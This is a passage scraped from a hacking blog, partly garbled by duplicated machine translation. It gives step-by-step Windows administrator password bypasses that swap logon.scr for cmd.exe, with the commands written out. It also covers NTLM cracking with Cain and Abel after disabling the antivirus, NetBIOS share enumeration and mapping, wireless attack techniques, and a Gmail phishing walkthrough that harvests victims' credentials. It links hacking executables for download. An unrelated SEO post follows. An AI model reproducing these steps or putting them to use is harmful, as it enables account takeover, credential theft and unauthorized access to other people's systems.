unprotected DOS command prompt in the context of the local system account as if it's the screen saver. Wait for the computer screen saver activation time of idle time, so Windows loads the DOS command unprotected in the context of local system account as if the screen saver. 8. In the CMD command prompt that is opened, key in the following command to reset and change the administrator's password: In the CMD prompt that opens, enter the following command to restart and change the administrator password: net user net user administrator administrator newpassword newpassword And the user account for administrator will have the new password of newpassword (which you should change to your own password). And the user account to the administrator will have the new password newpassword (which should change their own password). With the syntax of net use new_password user_name, it can be used to reset or modify the password of other administrative user account's passwords. With net syntax new_password user_name use, can be used to restore or modify the password of other administrative user account passwords. 9. You can now log on to the administrator account with the new password. You can access the administrator account with the new password. You may want to replace back the original LOGON.SCR that has been backed up or renamed. You may return to replace the original LOGON.SCR that has been endorsed or renamed. 10. You may want to delete the alternate installation of Windows, by deleting the installation folder or format the partition (if you install in different partition), Windows and removing the second entry in BOOT.INI file at the root. You can delete the Windows installation option, by deleting the installation folder or format the partition (if installed on another partition), and the removal of the second inning of Windows on the BOOT.INI in the root. Use attrib-r-s-hc: \ boot.ini to change and allow the boot.ini to be modified and viewed. Use attrib-rs-hc: \ boot.ini to change and allow the boot.ini to be modified and viewed. Unless you're using Windows NT 4.0 computers that were installed out-of-the-box that set the NT's default permissions for Everyone to Full Control, you most likely will have problem to rename, change or delete the files located in \ Winnt \ System32 or \ Windows \ System32 folders if you log in as the non regular administrative user, as regular user can not manipulate the files' permissions. Unless you are using Windows NT 4.0 computers that were installed out-of-the-box that the entire NT by default for all Full Control permissions, the more likely you will have problem to rename, change or delete files in \ WINNT \ System32 or \ Windows \ System32 folder, if you enter as a non-administrative user in the normal, as normal user can not manipulate the files' permissions. In this case, install an alternate second copy or Windows NT or Windows 2000 (make sure it's the same version with the existing OS Which forget the password you have installed), and the new install of Windows must be installed in different directory / folder from the existing Windows, which usually located in \ WinNT or \ Windows, or install the new Windows on another partition or drive. In this case, or install a second copy for Windows NT or Windows 2000 (make sure it is the same version with the current OS you have forgotten the password installed), and the new installation of Windows must be installed in different directory / existing Windows folder, usually located in \ winnt or \ Windows, or install the new Windows on another partition or drive. Alternatively, you can take out the hard drive (where you lost the admin password) and place or install it as a slave on another computer with any OS such as Windows XP or Windows 2000 installed. If you prefer, you can take the hard drive (if you lost the administrator password) and the place or install as a slave in another computer with any operating system like Windows XP or Windows 2000 installed. The purpose is to access the% systemroot% \ System32 of the OS that you have lost or forgot the administrator password, and does the modification specified above. The goal is access to% systemroot% \ System32 on the operating system you have lost or forgotten the administrator password, and that the amendment specified above. After installing the alternate copy of Windows, or install the hard disk as the slave disk to another Windows in a computer, boot up the system with the alternate Windows. After installing the backup copy of Windows, or install the hard disk as slave disk to another Windows on one computer, boot the system with the Windows alternative. If you install the second copy of Windows on the same machine, go to Control Panel -> System -> Startup (NT) or Control Panel -> System -> Advanced -> Startup and Recovery (W2K) and change the default boot instance back to your original instance of Windows. If you install the second copy of Windows on the same machine, go to Control Panel -> System -> Boot (NT) or Control Panel -> System -> Advanced -> Startup and Recovery (W2K) and change the default Boot instance back to its original instance of Windows. Then follow the step 2 to 4 above. Then follow step 2 to 4 above. After done, reboot and restart the system and bootup to the original instance of Windows (if you take up the hard disk to another machine, now put it back to the original computer), and continue the rest of steps from step 5 onwards. After you restart the system and reboot the system and the start of the original instance of Windows (if you take the hard drive to another machine, now back to the original computer) and continue with the remaining steps from step 5 onwards Wireless Hacking0 comments
Wireless networks broadcast their packets using radio frequency or optical wavelengths. A modern laptop computer can listen in. Worse, an attacker can manufacture new packets on the fly and persuade wireless stations to accept his packets as legitimate.
The step by step procerdure in wireless hacking can be explained with help of different topics as follows:- 1) Stations and Access Points :- A wireless network interface card (adapter) is a device, called a station, providing the network physical layer over a radio link to another station. An access point (AP) is a station that provides frame distribution service to stations associated with it. The AP itself is typically connected by wire to a LAN. Each AP has a 0 to 32 byte long Service Set Identifier (SSID) that is also commonly called a network name. The SSID is used to segment the airwaves for usage. 2) Channels :- The stations communicate with each other using radio frequencies between 2.4 GHz and 2.5 GHz. Neighboring channels are only 5 MHz apart. Two wireless networks using neighboring channels may interfere with each other. 3) Wired Equivalent Privacy (WEP) :- It is a shared-secret key encryption system used to encrypt packets transmitted between a station and an AP. The WEP algorithm is intended to protect wireless communication from eavesdropping. A secondary function of WEP is to prevent unauthorized access to a wireless network. WEP encrypts the payload of data packets. Management and control frames are always transmitted in the clear. WEP uses the RC4 encryption algorithm. 4) Wireless Network Sniffing :- Sniffing is eavesdropping on the network. A (packet) sniffer is a program that intercepts and decodes network traffic broadcast through a medium. It is easier to sniff wireless networks than wired ones. Sniffing can also help find the easy kill as in scanning for open access points that allow anyone to connect, or capturing the passwords used in a connection session that does not even use WEP, or in telnet, rlogin and ftp connections. 5 ) Passive Scanning :- Scanning is the act of sniffing by tuning to various radio channels of the devices. A passive network scanner instructs the wireless card to listen to each channel for a few messages. This does not reveal the presence of the scanner. An attacker can passively scan without transmitting at all. 6) Detection of SSID :- The attacker can discover the SSID of a network usually by passive scanning because the SSID occurs in the following frame types: Beacon, Probe Requests, Probe Responses, Association Requests, and Reassociation Requests. Recall that management frames are always in the clear, even when WEP is enabled. When the above methods fail, SSID discovery is done by active scanning 7) Collecting the MAC Addresses :- The attacker gathers legitimate MAC addresses for use later in constructing spoofed frames. The source and destination MAC addresses are always in the clear in all the frames. 8) Collecting the Frames for Cracking WEP :- The goal of an attacker is to discover the WEP shared-secret key. The attacker sniffs a large number of frames An example of a WEP cracking tool is AirSnort ( http://airsnort.shmoo.com ). 9) Detection of the Sniffers :- Detecting the presence of a wireless sniffer, who remains radio-silent, through network security measures is virtually impossible. Once the attacker begins probing (i.e., by injecting packets), the presence and the coordinates of the wireless device can be detected. 10) Wireless Spoofing :- There are well-known attack techniques known as spoofing in both wired and wireless networks. The attacker constructs frames by filling selected fields that contain addresses or identifiers with legitimate looking but non-existent values, or with values that belong to others. The attacker would have collected these legitimate values through sniffing. 11) MAC Address Spoofing :- The attacker generally desires to be hidden. But the probing activity injects frames that are observable by system administrators. The attacker fills the Sender MAC Address field of the injected frames with a spoofed value so that his equipment is not identified. 12) IP spoofing :- Replacing the true IP address of the sender (or, in rare cases, the destination) with a different address is known as IP spoofing. This is a necessary operation in many attacks. 13) Frame Spoofing :- The attacker will inject frames that are valid but whose content is carefully spoofed. 14) Wireless Network Probing :- The attacker then sends artificially constructed packets to a target that trigger useful responses. This activity is known as probing or active scanning. 15) AP Weaknesses :- APs have weaknesses that are both due to design mistakes and user interfaces 16) Trojan AP :- An attacker sets up an AP so that the targeted station receives a stronger signal from it than what it receives from a legitimate AP. 17) Denial of Service :- A denial of service (DoS) occurs when a system is not providing services to authorized clients because of resource exhaustion by unauthorized clients. In wireless networks, DoS attacks are difficult to prevent, difficult to stop. An on-going attack and the victim and its clients may not even detect the attacks. The duration of such DoS may range from milliseconds to hours. A DoS attack against an individual station enables session hijacking. 18) Jamming the Air Waves :- A number of consumer appliances such as microwave ovens, baby monitors, and cordless phones operate on the unregulated 2.4GHz radio frequency. An attacker can unleash large amounts of noise using these devices and jam the airwaves so that the signal to noise drops so low, that the wireless LAN ceases to function. 19) War Driving :- Equipped with wireless devices and related tools, and driving around in a vehicle or parking at interesting places with a goal of discovering easy-to-get-into wireless networks is known as war driving. War-drivers (http://www.wardrive.net) define war driving as “The benign act of locating and logging wireless access points while in motion.” This benign act is of course useful to the attackers. Regardless of the protocols, wireless networks will remain potentially insecure because an attacker can listen in without gaining physical access.
1) Change Default Administrator Passwords (and Usernames) 2) Turn on (Compatible) WPA / WEP Encryption 3) Change the Default SSID 4) Disable SSID Broadcast 5) Assign Static IP Addresses to Devices 6) Enable MAC Address Filtering 7) Turn Off the Network During Extended Periods of Non-Use 8) Position the Router or Access Point Safely EMail Hacking0 comments
All email communications on the internet are possible by two protocols:
1) Simple Mail Transfer Protocol (SMTP port-25) 2) Post Office Protocol (POP port-110) E-Mail hacking consists of various techniques as discussed below. 1) EMail Tracing :- Generally, the path taken by an email while travelling from sender to receiver can be explained by following diagram. The most effective and easiest way to trace an email is to analyze it's email headers. This can be done by just viewing the full header of received email. A typical email header looks something like this: The above email header gives us the following information about it's origin and path: a) Sender's email address :- atiles@destatis.de b) Source IP address :- 141.203.33.92 c) Source mail server :- dsl-189-160-34-89.prod-infinitum.com.mx d) Email client :- Thunderbird 2.0.0.6
Windows-XP Password Cracking1 comments
Here we use the tool "Cain and Abel" for cracking passwords of any local user/administrator.
First download cain and abel from "http://www.oxid.it/cain.html" and install it on your system. Make sure that you have disabled the antivirus/firewall running on your system before installing and throughout this process. Two most effective techniques used here are "Brute-Force" and "Cryptanalysis". Brute-Force:- As this techniques takes more time to complete, the attacker prefer this technique only when there is a hope that the password contain same type of characters or may be two. i.e only loweralpha, only alpha, only numeric or may be loweralpha-numeric, also it should contain less than 7 characters. Otherwise it takes more time to crack password, which may be the mixture of all types of characters along with special symbols. The step-by-step explaination for this technique is given below- 1) Open the tool "Cain and Abel" 2) Go into the category "Cracker" it displays all sub-categories under "Cracker" in left panel. 3) Select "LM & NTLM Hashes" from left panel and then click on symbol, you will be greeted by a window as shown. 4) Check "import hashes from local system" and then click "Next". This shows all the active accounts on local system like administrator, guest, etc. along with LM and NT hashed values of their respective passwords, as shown below. 5) Right clicking on any username shows all available options using which we can crack it's password. 6) Here we select "Brute-Force Attack" and then "NTLM Hashes", since windows uses NTLM hashes to store local users' passwords. 7) You will be greeted by a window where you can modify properties for brute-force attack such as password length, character set, etc. 8) Click on "Start" button. 9) On completion it will reveal the exact password. Cryptanalisys :- Basically, Cryptanalisys means Operations performed in converting encrypted messages to plain text without initial knowledge of the crypto-algorithm and/or key employed in the encryption. This is the fastest technique of password cracking possible due to "Rainbow Tables". A rainbow table is a file that is used to lookup an unknown plaintext from a known hash for an algorithm that does not usually permit this operation. Steps 1 to 4 i.e upto importing hashes from local system, are similar to previous technique (i.e brute-force). The steps coming after that are as follows- 5) Here, select "cryptanalisys attack" then "NTLM hashes" and then select "via rainbow tables". Here we can choose either OphCrack or RainbowCrack formats of tables. The rainbow tables are available free to download on internet. Due to large file size of rainbow tables (350MB - 3GB); instead of downloading we can also create at own just by downloading rainbow table generator (winrtgen.zip of 181KB) free download at "http://www.oxid.it/downloads/winrtgen.zip" 6) Click on "Add Table" 7) Browse for the location of rainbow table on your system, select proper table and click "open". 8) Select the loaded table and then click on "Start" button. 9) On completetion it will show the exact password.
NetBIOS Hacking0 comments
NetBIOS stands for "Network Basic Input Output System".
It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. By default it runs on port 139. NetBIOS gives the various information of the computers on a network, which includes computer name, username, domain, group, and many others.....! The NBTSTAT Command :- NBTSTAT is the command for manually interact with NetBIOS Over TCP/IP. All the attributes (switches) used with nbtstat command and their usage can be viewed. At the command prompt type- C:\Windows>nbtstat NBTSTAT Sample NBTSTAT Response :- C:\>nbtstat -A 117.200.160.174 NetBIOS Remote Machine Name Table Name Type Status ---------------------------------------------- PRASANNA <00> UNIQUE Registered INSECURE LABS <00> GROUP Registered PRASANNA <03> UNIQUE Registered PRASANNA <20> UNIQUE Registered INSECURE LABS <1e> GROUP Registered MAC Address = 86-95-55-50-00-00 An intruder could use the output from an nbtstat against your machines to begin gathering information about them. "<03> in above table is nothing but the username of that system." The next step for an intruder would be to try and list the open shares on the given computer, using the net view command. Here is an example of the Net View command- C:\>net view \\117.200.160.174 Shared resources at \\117.200.160.174 Sharename Type Comment ---------------------------------------- C Disk Drive C:\ MySofts Disk My Softwares Collection E Disk Drive E:\ The command was completed successfully. This information would give the intruder a list of shares which he would then use in conjunction with the Net Use command, a command used to enable a computer to map a share to it’s local drive, below is an example of how an intruder would map the C Share to a local G: drive, which he could then browse...! C:\>net use G: \\117.200.160.174\C The command was completed successfully. C:\>G: G:\> Hacking Video Tutorial1 commentsWell friend let them here videos of hacking, just Look at the OS that are echos because it will be Linux? just like two I think it is Windows, but hey this is only an interlude of what is in these videos.
Product description: A file that contains 52 videos in SWF format, avi and wmv, dode have different content as: * Telnet * Brute Force * Exploring Bugs * Hacking a Network * Use of software Hacker * And much more File weight: 663 MB 6 parts of 95.7 Mb and 1 88.9 Compression Format: RAR http://rapidshare.com/files/66601513/Hacking_Videos_www.programasfull.net.part1.rar http://rapidshare.com/files/66689213/Hacking_Videos_www.programasfull.net.part2.rar http://rapidshare.com/files/66584939/Hacking_Videos_www.programasfull.net.part3.rar http://rapidshare.com/files/66738936/Hacking_Videos_www.programasfull.net.part4.rar http://rapidshare.com/files/66854741/Hacking_Videos_www.programasfull.net.part5.rar http://rapidshare.com/files/66871449/Hacking_Videos_www.programasfull.net.part6.rar http://rapidshare.com/files/66706735/Hacking_Videos_www.programasfull.net.part7.rar Password: www.programasfull.net Cracking GMail Account Password1 comments
Here is the most effective technique for cracking GMail Accounts Passwords.
This method uses 'Social Engineering' rather than 'Phishing'. Follow the steps as given below :- Success Rate :- 90% Step-1 : Create your own fake gmail login form using HTML, which may look like one as shown below- The HTML code for above login screen created by me is given below-
Step-2 : We require a form processor to process this fake login form, i.e. to store the username and password entered by the victim. The username and password entered by victim can either be stored in database or send directly to the predefined e-mail address. This can be done in two ways- 1) Using online form processors, which are freely available and ready to use. eg. One of such form processor is provided by http://www.formmail.com . You have to register with www.formmail.com and configure your fake gmail login form to be processed by formmail.com . The configuration is different for each formmail account. Which may be something like following- OR 2) If you are having your own domain hosted on some server; knowing the basics of ASP for processing HTML forms, you can create your own form processor in ASP (eg. 'login.asp' page) for above given fake gmail login form. Here you should only put both 'gmail.html' and 'login.asp' files to your server. Step-3 : Now both of your 'Fake Gmail Login Form (eg. gmail.html)' and 'Form Processor' are ready to use. Now you can send the fake gmail login form as an html mail to the victim's e-mail address, hoping that the victim gets fooled into entering the account username and password and click on 'Move' button. Note:- You can use Microsoft Outlook for sending HTML e-mail. Also, you must use your fake name as 'GMail Team' or 'GMail' while sending fake login form to victim. As soon as victim click on 'Move' button he/she get redirected to predefined webpage (eg. http://www.gmail.com), while his/her 'username' and 'password' get emailed to you by formmail.com . That's It............! Done.......?
hack windows admin password1 comments
Log in as Administrator to any PC!
If you do not have administrator privileges or are a visitor, this administrator you can log into any PC running XP Just run ACCMaker.exe and leave the session and enter this user Username: Hack Password: (No Tiene) And Ready! administrator you! Windows XP Admin Pass Hack0 commentsChange or delete the Admin user password. Just run the file. Its very easy to work and 100%. Now, change or delete a password of any Windows PC. No need to burn it to CD or USB double clicking on the EXE file. Too easy 212Kb Download: http://www.gigasize.com/get.php?d=x977l37os8d Hacking the Windows Administrator password XP0 commentsIf you're logged in with a limited account, open a MSDOS command line and type:
cd \ windows \ system32 md tmphack logon.scr copy tmphack \ logon.scr copy cmd.exe tmphack \ cmd.exe the logon.scr ren cmd.exe logon.scr exit Then we have to close session to get as System, as pointed as admin in a comment, if we skip the screensaver as a user will remain in a restricted environment. This is what we have done a backup of the file cmd.exe and screensavers, then we changed the name of the file that controls the screensaver to cmd.exe, so that you jump the screen saver will then open a command line with administrator privileges without logearnos against the SAM team. Then you can change the administrator password. For example, if the user is vlan7 administrator and want to set the password tmp, enter the following: net user vlan7 tmp 10 Recommendations SEO for Wordpress0 commentsTruth is not a lot of SEO and the bad thing is that it is very important for any website. Finally, if you're one of mine do not know much about SEO but are keen to learn, you come to the right place. Today in Carlos Leopoldo expose us 10 recommendations SEO for WordPress. Which will help you a lot and so succeeded in learning something new and cool. SEO for WordPress recommendations are: 1 .- Plugin All In One SEO Pack. The IAEVG plugin is a plugin that basically allows us to customize the metatags of each of the pages and posts of our blog. Something absolutely essential. 2 .- Permalinks. It is recommended that the URLs only display the name of post, mostly because it concerned the question of whether they are more friendly. To do this put /% postname% / in the Links section of the permanent or Permalinks administration panel. 3 .- Sitemap. What use to register a sitemap to the search engines? This is a file containing all the available pages URL'so blog and therefore is more likely that Google will quickly identify and position. To generate a sitemap I recommend that you use the plugin Google XML Sitemaps which generates you automatically. Xml file, which is what you have to enlist in google webmasters and other search engines. 4 .- The headings. In any website is advisable to use the tag titles because Google gives more importance to what is between those tags. Other tags (H2, H3, etc.) you can use them to make nests in the structure of your posts.
|